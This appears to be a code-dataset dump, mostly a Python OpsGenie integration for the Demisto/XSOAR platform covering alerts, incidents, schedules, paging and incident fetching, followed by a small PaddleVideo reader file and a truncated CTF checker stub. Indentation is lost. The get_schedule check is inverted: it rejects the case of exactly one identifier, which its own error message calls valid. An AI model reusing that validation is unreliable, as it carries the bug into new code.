-> Dict[str, Union[List, Dict]]: # type: ignore
"""
:param responders: the responders list which we get from demisto.args()
:param responder_key: Some of the api calls need "responder" and others "responders" as a
key in the responders jason
:param one_is_dict: Some of the api calls need when there is one responder it as a dict
and others as a list
:return json_responders: reformatted respondres dict
"""
if not responders:
return {}
if len(responders) % 3 != 0:
raise DemistoException("responders must be list of: responder_type, value_type, value")
responders_triple = list(zip(responders[::3], responders[1::3], responders[2::3]))
json_responders = {responder_key: []} # type: ignore
for responder_type, value_type, value in responders_triple:
if responder_type == "user" and value_type == "name":
value_type = "username"
json_responders[responder_key].append({value_type: value, "type": responder_type})
response = json_responders
if len(responders_triple) == 1 and one_is_dict:
response = {responder_key: json_responders[responder_key][0]}
return response # type: ignore
def create_alert(self, args: dict):
args['responders'] = argToList(args.get('responders'))
args.update(Client.responders_to_json(args.get('responders', []), "responders"))
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}",
json_data=args)
def get_alert(self, alert_id: int):
return self._http_request(method='GET',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{alert_id}"
)
def list_alerts(self, args: dict):
args['tags'] = argToList(args.get('tags'))
params = {
"limit": args.get("limit"),
"offset": args.get("offset"),
"query": Client.build_query(args)
}
res = self._http_request(method='GET',
url_suffix=f"/v2/{ALERTS_SUFFIX}",
params=params
)
if len(res.get("data", [])) > 0:
for result in res.get("data"):
result['event_type'] = ALERT_TYPE
return res
def delete_alert(self, args: dict):
return self._http_request(method='DELETE',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}",
json_data=args)
def ack_alert(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/"
f"{args.get('alert-id')}/acknowledge",
json_data=args)
def close_alert(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/close",
json_data=args)
def assign_alert(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/assign",
json_data=args)
def add_responder_alert(self, args: dict):
alert_id = args.get('alert-id')
identifier = args.get('identifierType', 'id')
args['responders'] = argToList(args.get('responders'))
args.update(Client.responders_to_json(responders=args.get('responders', []),
responder_key="responder",
one_is_dict=True))
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{alert_id}/responders",
params={"identifierType": identifier},
json_data=args)
def get_escalation(self, args: dict):
if args.get("escalation_id") and args.get("escalation_name"):
raise DemistoException("Either escalation_id or escalation_name should be provided.")
identifier_type = "id" if args.get("escalation_id") else "name"
escalation = args.get("escalation_id", None) or args.get("escalation_name", None)
return self._http_request(method='GET',
url_suffix=f"/v2/{ESCALATION_SUFFIX}/{escalation}",
params={"identifierType": identifier_type}
)
def get_escalations(self):
return self._http_request(method='GET',
url_suffix=f"/v2/{ESCALATION_SUFFIX}"
)
def escalate_alert(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/escalate",
json_data=args)
def add_alert_tag(self, args: dict):
args['tags'] = argToList(args.get('tags'))
return self._http_request(method='POST',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/tags",
json_data=args)
def remove_alert_tag(self, args: dict):
args['tags'] = argToList(args.get('tags'))
return self._http_request(method='DELETE',
url_suffix=f"/v2/{ALERTS_SUFFIX}/{args.get('alert-id')}/tags",
params={"tags": args.get('tags')},
json_data=args)
def get_alert_attachments(self, args: dict):
attachment_id = args.get("attachment_id")
if attachment_id:
return self._http_request(method='GET',
url_suffix=f"/v2/{ALERTS_SUFFIX}/attachments/{attachment_id}")
return self._http_request(method='GET',
url_suffix=f"/v2/{ALERTS_SUFFIX}/"
f"{args.get('alert-id')}/attachments")
def get_schedule(self, args: dict):
if not (args.get("schedule_id") and args.get("schedule_name")):
raise DemistoException("Either schedule_id or schedule_name should be provided.")
identifier_type = "id" if args.get("schedule_id") else "name"
schedule = args.get("schedule_id", None) or args.get("schedule_name", None)
return self._http_request(method='GET',
url_suffix=f"/v2/{SCHEDULE_SUFFIX}/{schedule}",
params={"identifierType": identifier_type}
)
def list_schedules(self):
return self._http_request(method='GET',
url_suffix=f"/v2/{SCHEDULE_SUFFIX}"
)
def get_schedule_override(self, args: dict):
identifier_type = "id" if args.get("schedule_id") else "name"
schedule = args.get("schedule_id", None) or args.get("schedule_name", None)
return self._http_request(method='GET',
url_suffix=f"/v2/{SCHEDULE_SUFFIX}/{schedule}/"
f"overrides/{args.get('override_alias')}",
params={"scheduleIdentifierType": identifier_type}
)
def list_schedule_overrides(self, args: dict):
identifier_type = "id" if args.get("schedule_id") else "name"
schedule = args.get("schedule_id", None) or args.get("schedule_name", None)
return self._http_request(method='GET',
url_suffix=f"/v2/{SCHEDULE_SUFFIX}/{schedule}/overrides",
params={"scheduleIdentifierType": identifier_type}
)
def get_on_call(self, args: dict):
return self._http_request(method='GET', url_suffix=f"/v2/{SCHEDULE_SUFFIX}/" f"{args.get('schedule')}/on-calls",
params={"scheduleIdentifierType": args.get('scheduleIdentifierType')})
def create_incident(self, args: dict):
args['responders'] = argToList(args.get('responders'))
args.update(Client.responders_to_json(args.get('responders', []), "responders"))
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/create",
json_data=args)
def delete_incident(self, args: dict):
return self._http_request(method='DELETE',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/{args.get('incident_id')}",
json_data=args)
def get_incident(self, args: dict):
return self._http_request(method='GET',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/{args.get('incident_id')}",
)
@staticmethod
def build_query(args: dict) -> str:
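        # compose an OpsGenie search query string, e.g. "status=open AND priority: (P1 OR P2) AND tag: (prod)"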
query = ""
if args.get("query", ""):
query = args.get("query", "")
if args.get("is_fetch_query", False) or not args.get("query", ""):
status = args.get("status", ALL_TYPE)
if status != ALL_TYPE:
query += ' AND ' if query else ''
query += f'status={status.lower()}'
priority = argToList(args.get("priority", [ALL_TYPE]))
if ALL_TYPE not in priority:
query += ' AND ' if query else ''
priority_parsed = ' OR '.join([p for p in priority])
query += f'priority: ({priority_parsed})'
tags = argToList(args.get("tags", []))
if tags:
query += ' AND ' if query else ''
tag_parsed = ' OR '.join([t for t in tags])
query += f'tag: ({tag_parsed})'
return query
def list_incidents(self, args: dict):
args['tags'] = argToList(args.get('tags'))
params = {
"limit": args.get("limit"),
"offset": args.get("offset"),
"query": Client.build_query(args)
}
res = self._http_request(method='GET',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}",
params=params
)
if len(res.get("data", [])) > 0:
for result in res.get("data"):
result['event_type'] = INCIDENT_TYPE
return res
def close_incident(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/close",
json_data=args)
def resolve_incident(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/resolve",
json_data=args)
def add_responder_incident(self, args: dict):
args['responders'] = argToList(args.get('responders'))
args.update(Client.responders_to_json(args.get('responders', []), "responder"))
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/responders",
json_data=args)
def add_tag_incident(self, args: dict):
args['tags'] = argToList(args.get('tags'))
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/tags",
json_data=args)
def remove_tag_incident(self, args: dict):
args['tags'] = argToList(args.get('tags'))
return self._http_request(method='DELETE',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/tags",
params={"tags": args.get('tags')},
json_data=args)
def get_team(self, args: dict):
return self._http_request(method='GET',
url_suffix=f"/v2/{TEAMS_SUFFIX}/{args.get('team_id')}"
)
def list_teams(self):
return self._http_request(method='GET',
url_suffix=f"/v2/{TEAMS_SUFFIX}"
)
''' COMMAND FUNCTIONS '''
def run_polling_paging_command(args: dict, cmd: str, results_function: Callable,
action_function: Optional[Callable] = None) -> CommandResults:
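    # Start the request via action_function on the first call, then keep rescheduling the
    # command with ScheduledCommand, following the 'paging.next' URL until 'limit' results
    # have been accumulated.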
ScheduledCommand.raise_error_if_not_supported()
interval_in_secs = int(args.get('interval_in_seconds', DEFAULT_POLL_INTERVAL))
result = args.get('result', [])
limit = int(args.get('limit', 20))
if "request_id" not in args and action_function:
# starting new flow
results = action_function(args)
request_id = results.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {results}")
next_paging = results.get("paging", {}).get("next")
result = result + results.get("data")
if not next_paging or len(result) >= limit:
# If not a paged request, simply return
return CommandResults(
outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs=results.get("data"),
readable_output=tableToMarkdown("OpsGenie", results.get('data'),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status', 'tags'],
removeNull=True
),
raw_response=results
)
else:
# If a paged request, return scheduled_command
args['request_id'] = request_id
args['result'] = result
args['paging'] = next_paging
polling_args = {
'interval_in_seconds': interval_in_secs,
'polling': True,
**args
}
scheduled_command = ScheduledCommand(
command=cmd,
next_run_in_seconds=int(args.get('interval_in_seconds', DEFAULT_POLL_INTERVAL)),
args=polling_args,
timeout_in_seconds=int(args.get('timeout_in_seconds', DEFAULT_POLL_TIMEOUT)),
)
return CommandResults(scheduled_command=scheduled_command,
readable_output=f"Waiting for request_id={request_id}",
outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs={"requestId": request_id})
results = results_function(args)
result = result + results.get("data")
results['data'] = result
next_paging = results.get("paging", {}).get("next")
if not next_paging or len(result) >= limit:
# If not a paged request, simply return
return CommandResults(
outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs=results.get("data"),
readable_output=tableToMarkdown("OpsGenie", results.get('data'),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status', 'tags'],
removeNull=True
),
raw_response=results
)
if len(result) < limit:
# schedule next poll
args['request_id'] = results.get('request_id')
args['result'] = result
args['paging'] = next_paging
polling_args = {
'interval_in_seconds': interval_in_secs,
'polling': True,
**args
}
scheduled_command = ScheduledCommand(
command=cmd,
next_run_in_seconds=int(args.get('interval_in_seconds', DEFAULT_POLL_INTERVAL)),
args=polling_args,
timeout_in_seconds=int(args.get('timeout_in_seconds', DEFAULT_POLL_TIMEOUT))
)
# result with scheduled_command only - no update to the war room
command_results = CommandResults(scheduled_command=scheduled_command,
readable_output=f"Waiting for request_id={args.get('request_id')}",
outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs={"requestId": args.get('request_id')})
return command_results
return CommandResults(outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs=results.get("data"),
readable_output=tableToMarkdown("OpsGenie", results.get('data'),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status',
'tags'],
removeNull=True
),
raw_response=results
)
def test_module(client: Client, params: dict) -> str:
"""
Tries to run list_alerts, returning OK if integration is working.
"""
result_list = client.list_alerts({"sort": "createdAt", "limit": 5})
result_fetch = [{'ok': 'ok'}]
if params.get("isFetch"):
result_fetch, last_run = fetch_incidents_command(client, params)
if result_list and result_fetch:
return 'ok'
return 'Failed.'
def create_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.Alert',
**args
}
data = client.create_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_alerts(client: Client, args: Dict[str, Any]) -> CommandResults:
alert_id = args.get("alert-id", None)
result = client.get_alert(alert_id) if alert_id else list_alerts(client, args)
if isinstance(result, CommandResults):
return result
return CommandResults(
outputs_prefix="OpsGenie.Alert",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Alert",
result.get("data"),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status', 'tags'],
removeNull=True
),
raw_response=result
)
def list_alerts(client: Client, args: Dict[str, Any]) -> CommandResults:
polling_args = {
'url_suffix': f"/v2/{ALERTS_SUFFIX}",
'output_prefix': 'OpsGenie.Alert',
'request_type': ALERTS_SUFFIX,
**args
}
polling_result = run_polling_paging_command(args=polling_args,
cmd='opsgenie-get-alerts',
action_function=client.list_alerts,
results_function=client.get_paged)
return polling_result
def delete_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.DeletedAlert',
**args
}
data = client.delete_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def ack_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.AckedAlert',
**args
}
data = client.ack_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def close_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.ClosedAlert',
**args
}
data = client.close_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def assign_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
if args.get("owner_id"):
owner = {"id": args.get("owner_id")}
elif args.get("owner_username"):
owner = {"username": args.get("owner_username")}
else: # not args.get("owner_id") and not args.get("owner_username")
raise DemistoException("Either owner_id or owner_username should be provided.")
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.AssignAlert',
'owner': owner,
**args
}
data = client.assign_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def add_responder_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.AddResponderAlert',
**args
}
data = client.add_responder_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_escalations(client: Client, args: Dict[str, Any]) -> CommandResults:
escalation = args.get("escalation_id", None) or args.get("escalation_name", None)
result = client.get_escalation(args) if escalation else client.get_escalations()
return CommandResults(
outputs_prefix="OpsGenie.Escalations",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Escalations", result.get("data")),
raw_response=result
)
def escalate_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
if args.get("escalation_id"):
escalation = {"id": args.get("escalation_id")}
elif args.get("escalation_name"):
escalation = {"name": args.get("escalation_name")}
else: # not args.get("owner_id") and not args.get("owner_username")
raise DemistoException("Either escalation_id or escalation_name should be provided.")
args = {
'request_type': ALERTS_SUFFIX,
'escalation': escalation,
'output_prefix': 'OpsGenie.EscalateAlert',
**args
}
data = client.escalate_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def add_alert_tag(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.AddTagAlert',
**args
}
data = client.add_alert_tag(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def remove_alert_tag(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.RemoveTagAlert',
**args
}
data = client.remove_alert_tag(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_alert_attachments(client: Client, args: Dict[str, Any]) -> CommandResults:
result = client.get_alert_attachments(args)
return CommandResults(
outputs_prefix="OpsGenie.Alert.Attachment",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Attachment", result.get("data")),
raw_response=result
)
def get_schedules(client: Client, args: Dict[str, Any]) -> CommandResults:
schedule = args.get("schedule_id", None) or args.get("schedule_name", None)
result = client.get_schedule(args) if schedule else client.list_schedules()
return CommandResults(
outputs_prefix="OpsGenie.Schedule",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Schedule", result.get("data")),
raw_response=result
)
def get_schedule_overrides(client: Client, args: Dict[str, Any]) -> CommandResults:
if not args.get("schedule_id") and not args.get("schedule_name"):
raise DemistoException("Either schedule_id or schedule_name should be provided.")
result = client.get_schedule_override(args) if args.get("override_alias") \
else client.list_schedule_overrides(args)
return CommandResults(
outputs_prefix="OpsGenie.Schedule",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Schedule", result.get("data")),
raw_response=result
)
def get_on_call(client: Client, args: Dict[str, Any]) -> CommandResults:
if args.get("schedule_id"):
schedule = args.get("schedule_id")
schedule_identifier_type = 'id'
elif args.get("schedule_name"):
schedule = args.get("schedule_name")
schedule_identifier_type = 'name'
else: # not args.get("schedule_id") and not args.get("schedule_name")
raise DemistoException("Either schedule_id or schedule_name should be provided.")
on_call_args = {
'request_type': SCHEDULE_SUFFIX,
'scheduleIdentifierType': schedule_identifier_type,
'schedule': schedule,
**args
}
result = client.get_on_call(on_call_args)
command_result = CommandResults(
outputs_prefix="OpsGenie.Schedule.OnCall",
outputs=result,
readable_output=tableToMarkdown("OpsGenie Schedule OnCall", result.get('data')),
raw_response=result
)
return command_result
def create_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.Incident',
**args
}
data = client.create_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def delete_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.DeletedIncident',
**args
}
data = client.delete_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_incidents(client: Client, args: Dict[str, Any]) -> CommandResults:
incident_id = args.get("incident_id", None)
result = client.get_incident(args) if incident_id else list_incidents(client, args)
if isinstance(result, CommandResults):
return result
return CommandResults(
outputs_prefix="OpsGenie.Incident",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Incident",
result.get("data"),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status', 'tags'],
removeNull=True
),
raw_response=result
)
def list_incidents(client: Client, args: Dict[str, Any]) -> CommandResults:
polling_args = {
'url_suffix': f"/v1/{INCIDENTS_SUFFIX}",
'output_prefix': 'OpsGenie.Incident',
**args
}
polling_result = run_polling_paging_command(args=polling_args,
cmd='opsgenie-get-incidents',
action_function=client.list_incidents,
results_function=client.get_paged)
return polling_result
def close_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.ClosedIncident',
**args
}
data = client.close_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def resolve_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.ResolvedIncident',
**args
}
data = client.resolve_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def add_responder_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.AddResponderIncident',
**args
}
data = client.add_responder_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def add_tag_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.AddTagIncident',
**args
}
data = client.add_tag_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def remove_tag_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.RemoveTagIncident',
**args
}
data = client.remove_tag_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_request_command(client: Client, args: Dict[str, Any]) -> CommandResults:
request_type = str(args.get('request_type'))
results: Response = client.get_request(args)
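    # The requests endpoint returns 404 while the asynchronous action is still being
    # processed, so schedule another poll instead of failing.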
if results.status_code == 404:
ScheduledCommand.raise_error_if_not_supported()
request_id = args.get('request_id')
return CommandResults(
raw_response=results,
readable_output=None if args.get('polled_once') else f"Waiting for request_id={request_id}",
outputs_prefix=args.get("output_prefix", "OpsGenie.Request"),
outputs=None if args.get('polled_once') else {"requestId": request_id},
scheduled_command=ScheduledCommand(command='opsgenie-get-request',
next_run_in_seconds=int(
args.get('interval_in_seconds', DEFAULT_POLL_INTERVAL)),
args={**args, 'polled_once': True},
timeout_in_seconds=int(
args.get('timeout_in_seconds', DEFAULT_POLL_TIMEOUT))))
else:
results_dict = results.json()
return CommandResults(
outputs_prefix=args.get("output_prefix", f'OpsGenie.{request_type.capitalize()[:-1]}'),
outputs=results_dict.get("data"),
readable_output=tableToMarkdown("OpsGenie", results_dict.get('data')),
raw_response=results_dict
)
def get_teams(client: Client, args: Dict[str, Any]) -> CommandResults:
result = client.get_team(args) if args.get("team_id") else client.list_teams()
return CommandResults(
outputs_prefix="OpsGenie.Team",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Team", result.get("data")),
raw_response=result
)
def _parse_fetch_time(fetch_time: str):
return dateparser.parse(date_string=f"{fetch_time} UTC").strftime(DATE_FORMAT)
def fetch_incidents_by_type(client: Client,
query: Optional[str],
limit: Optional[int],
fetch_time: str,
status: Optional[str],
priority: Optional[str],
tags: Optional[str],
incident_fetching_func: Callable,
now: datetime,
last_run_dict: Optional[dict] = None):
params: Dict[str, Any] = {}
if not last_run_dict:
new_last_run = _parse_fetch_time(fetch_time)
last_run_dict = {'lastRun': new_last_run,
'next_page': None}
if last_run_dict.get('next_page'):
raw_response = client.get_paged({"paging": last_run_dict.get('next_page')})
else:
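        # no pending page: query a createdAt window from the last run up to now (epoch seconds)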
timestamp_now = int(now.timestamp())
last_run = last_run_dict.get('lastRun')
timestamp_last_run = int(dateparser.parse(last_run).timestamp())
time_query = f'createdAt>{timestamp_last_run} AND createdAt<={timestamp_now}'
params['query'] = f'{query} AND {time_query}' if query else f'{time_query}'
params['limit'] = limit
params['is_fetch_query'] = True if query else False
params['status'] = status
params["priority"] = priority
params["tags"] = tags
raw_response = incident_fetching_func(params)
last_run_dict['lastRun'] = now.strftime(DATE_FORMAT)
data = raw_response.get('data')
incidents = []
if data:
for event in data:
incidents.append({
'name': event.get('message'),
'occurred': event.get('createdAt'),
'rawJSON': json.dumps(event)
})
if last_run_dict.get('lastRun') < event.get('createdAt'):
last_run_dict['lastRun'] = event.get('createdAt')
return incidents, raw_response.get("paging", {}).get("next"), last_run_dict.get('lastRun')
def _get_utc_now():
return datetime.utcnow()
def fetch_incidents_command(client: Client,
params: Dict[str, Any],
last_run: Optional[Dict] = None) -> Tuple[List[Dict[str, Any]], Dict]:
"""Uses to fetch incidents into Demisto
Documentation: https://github.com/demisto/content/tree/master/docs/fetching_incidents
Args:
client: Client object with request
last_run: Last fetch object occurs
params: demisto params
Returns:
incidents, new last_run
"""
demisto.debug(f"Got incidentType={params.get('event_types')}")
event_type = params.get('event_types', [ALL_TYPE])
demisto.debug(f"Got event_type={event_type}")
now = _get_utc_now()
incidents = []
alerts = []
last_run_alerts = demisto.get(last_run, f"{ALERT_TYPE}.lastRun")
next_page_alerts = demisto.get(last_run, f"{ALERT_TYPE}.next_page")
last_run_incidents = demisto.get(last_run, f"{INCIDENT_TYPE}.lastRun")
next_page_incidents = demisto.get(last_run, f"{INCIDENT_TYPE}.next_page")
query = params.get('query')
limit = int(params.get('max_fetch', 50))
fetch_time = params.get('first_fetch', '3 days').strip()
status = params.get('status')
priority = params.get('priority')
tags = params.get('tags')
if ALERT_TYPE in event_type or ALL_TYPE in event_type:
alerts, next_page_alerts, last_run_alerts = fetch_incidents_by_type(client,
query,
limit,
fetch_time,
status,
priority,
tags,
client.list_alerts,
now,
demisto.get(last_run, f"{ALERT_TYPE}"))
if INCIDENT_TYPE in event_type or ALL_TYPE in event_type:
incidents, next_page_incidents, last_run_incidents = fetch_incidents_by_type(client,
query,
limit,
fetch_time,
status,
priority,
tags,
client.list_incidents,
now,
demisto.get(last_run, f"{INCIDENT_TYPE}"))
return incidents + alerts, {ALERT_TYPE: {'lastRun': last_run_alerts,
'next_page': next_page_alerts},
INCIDENT_TYPE: {'lastRun': last_run_incidents,
'next_page': next_page_incidents}
}
''' MAIN FUNCTION '''
def main() -> None:
api_key = demisto.params().get('credentials', {}).get("password")
base_url = demisto.params().get('url')
verify_certificate = not demisto.params().get('insecure', False)
proxy = demisto.params().get('proxy', False)
demisto.debug(f'Command being called is {demisto.command()}')
try:
client = Client(
base_url=base_url,
verify=verify_certificate,
proxy=proxy,
headers={
"Authorization": f"GenieKey {api_key}",
}
)
commands = {
'opsgenie-create-alert': create_alert,
'opsgenie-get-alerts': get_alerts,
'opsgenie-delete-alert': delete_alert,
'opsgenie-ack-alert': ack_alert,
'opsgenie-close-alert': close_alert,
'opsgenie-assign-alert': assign_alert,
'opsgenie-add-responder-alert': add_responder_alert,
'opsgenie-get-escalations': get_escalations,
'opsgenie-escalate-alert': escalate_alert,
'opsgenie-add-alert-tag': add_alert_tag,
'opsgenie-remove-alert-tag': remove_alert_tag,
'opsgenie-get-alert-attachments': get_alert_attachments,
'opsgenie-get-schedules': get_schedules,
'opsgenie-get-schedule-overrides': get_schedule_overrides,
'opsgenie-get-on-call': get_on_call,
'opsgenie-create-incident': create_incident,
'opsgenie-delete-incident': delete_incident,
'opsgenie-get-incidents': get_incidents,
'opsgenie-close-incident': close_incident,
'opsgenie-resolve-incident': resolve_incident,
'opsgenie-add-responder-incident': add_responder_incident,
'opsgenie-add-tag-incident': add_tag_incident,
'opsgenie-remove-tag-incident': remove_tag_incident,
'opsgenie-get-teams': get_teams,
'opsgenie-get-request': get_request_command
}
command = demisto.command()
if command == 'test-module':
# This is the call made when pressing the integration Test button.
return_results(test_module(client, demisto.params()))
elif command == 'fetch-incidents':
incidents, new_run_date = fetch_incidents_command(client=client,
params=demisto.params(),
last_run=demisto.getLastRun().get('lastRun'))
demisto.setLastRun(new_run_date)
demisto.incidents(incidents)
elif command in commands:
return_results(commands[command](client, demisto.args()))
else:
raise NotImplementedError(f'Command "{command}" was not implemented.')
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 43.061584 | 127 | 0.56145 |
547b2d6bb2495dadccd53e178ab80cb656a66496
| 552 |
py
|
Python
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/applications/FootballAction/predict/action_detect/reader/__init__.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 5 |
2022-01-30T07:35:58.000Z
|
2022-02-08T05:45:20.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/applications/FootballAction/predict/action_detect/reader/__init__.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-14T02:33:28.000Z
|
2022-01-14T02:33:28.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/applications/FootballAction/predict/action_detect/reader/__init__.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-24T16:27:01.000Z
|
2022-01-24T16:27:01.000Z
|
"""
read map for model
"""
from reader.reader_utils import regist_reader, get_reader
import reader.tsminf_reader as tsminf_reader
import reader.audio_reader as audio_reader
import reader.bmninf_reader as bmninf_reader
import reader.feature_reader as feature_reader
# regist reader, sort by alphabet
regist_reader("TSM", tsminf_reader.TSMINFReader)
regist_reader("PPTSM", tsminf_reader.TSMINFReader)
regist_reader("AUDIO", audio_reader.AudioReader)
regist_reader("BMN", bmninf_reader.BMNINFReader)
regist_reader("ACTION", feature_reader.FeatureReader)
| 34.5 | 57 | 0.84058 |
5480abd39228b998376048cbfebd7715298f8684
| 184 |
py
|
Python
|
checker/responsivesecurity/reference.py
|
fausecteam/faustctf-2019-responsivesecurity
|
65b4e02bdc9de278166c38697ab992638977d511
|
[
"0BSD"
] | null | null | null |
checker/responsivesecurity/reference.py
|
fausecteam/faustctf-2019-responsivesecurity
|
65b4e02bdc9de278166c38697ab992638977d511
|
[
"0BSD"
] | null | null | null |
checker/responsivesecurity/reference.py
|
fausecteam/faustctf-2019-responsivesecurity
|
65b4e02bdc9de278166c38697ab992638977d511
|
[
"0BSD"
] | null | null | null |
import requests
def store(endpoint, userid, path, data):
